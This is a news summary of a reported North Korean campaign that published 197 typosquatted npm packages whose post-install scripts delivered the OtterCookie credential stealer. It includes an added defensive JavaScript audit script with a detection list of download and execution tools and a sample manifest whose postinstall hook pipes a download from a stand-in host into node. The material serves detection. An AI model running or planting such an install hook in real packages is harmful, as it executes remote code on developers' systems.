A sophisticated software supply chain attack has been identified, involving North Korean state-sponsored hackers. The threat actor successfully published 197 malicious packages to the npm (Node Package Manager) registry with the objective of distributing an updated version of the OtterCookie malware.
The campaign represents a significant effort to compromise developers by injecting malicious code into the open-source software ecosystem. Security researchers who discovered the packages attribute the activity to established North Korean threat groups known for targeting the technology and software development sectors.
Attack Vector: Malicious npm Packages
The core of the attack involved the deployment of 197 distinct packages on the public npm repository. These packages were engineered to appear legitimate, often using names similar to popular libraries to trick developers into installing them. This technique is a form of typosquatting.
Once a malicious package was installed as a dependency in a developer’s project, a post-install script was executed. This script initiated the download and execution of the primary payload, the OtterCookie malware, from an attacker-controlled command-and-control (C2) server. The npm security team was notified of the malicious packages to initiate their removal from the registry.
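A defender-side check for the install-hook technique described above, added here as an example (not code from the article, the researchers, or the npm project): it audits package manifests for lifecycle scripts that fetch or execute remote content. The sample manifests and the indicator patterns are constructed assumptions, not indicators from the campaign.

```javascript
// Added example: audit package.json manifests for npm lifecycle hooks that
// fetch-and-execute remote content. Sample manifests below are constructed.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators of a remote download-and-run stage (assumed list).
const SUSPICIOUS = [
  /\bcurl\b/i, /\bwget\b/i, /\bpowershell\b/i,
  /\bnode\s+-e\b/i, /\bbase64\b/i, /https?:\/\//i, /\beval\(/i,
];

// Inspect one parsed package.json; returns one finding per lifecycle hook.
function auditManifest(name, manifest) {
  const scripts = (manifest && manifest.scripts) || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue; // hook not defined
    const hits = SUSPICIOUS.filter((re) => re.test(cmd)).map((re) => re.source);
    findings.push({
      package: name, hook, command: cmd,
      suspicious: hits.length > 0, indicators: hits,
    });
  }
  return findings;
}

// Audit a map of package name -> parsed manifest (in practice, every
// node_modules/*/package.json read with fs and JSON.parse) and keep only
// hooks that matched an indicator.
function auditPackages(manifests) {
  return Object.entries(manifests)
    .flatMap(([name, manifest]) => auditManifest(name, manifest))
    .filter((f) => f.suspicious);
}

// Constructed sample manifests (hypothetical package names, not real ones).
const SAMPLE_MANIFESTS = {
  "benign-lib": { scripts: { test: "mocha", postinstall: "node scripts/build.js" } },
  "lookalike-lib": { scripts: { postinstall: "curl -s http://example.invalid/p | node" } },
  "no-scripts": { version: "1.0.0" },
};

for (const f of auditPackages(SAMPLE_MANIFESTS)) {
  console.log(`${f.package} ${f.hook}: ${f.command} [${f.indicators.join(", ")}]`);
}
```

A complementary control is to install with `npm install --ignore-scripts` so that lifecycle hooks never run automatically, then run the hooks of packages that genuinely need them after review.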
OtterCookie Malware Analysis
The payload delivered in this campaign is a newly identified, updated variant of the OtterCookie malware. OtterCookie is a known information stealer and credential harvester. Its primary function is to exfiltrate sensitive data from compromised systems.
This version of the malware is specifically designed to steal browser data, including cookies, login credentials, and browsing history. The stolen information is then transmitted back to the attackers’ infrastructure. The updates to the malware focused on enhancing its persistence and evasion capabilities to avoid detection by security software.
Source: https://thehackernews.com/2025/11/north-korean-hackers-deploy-197-npm.html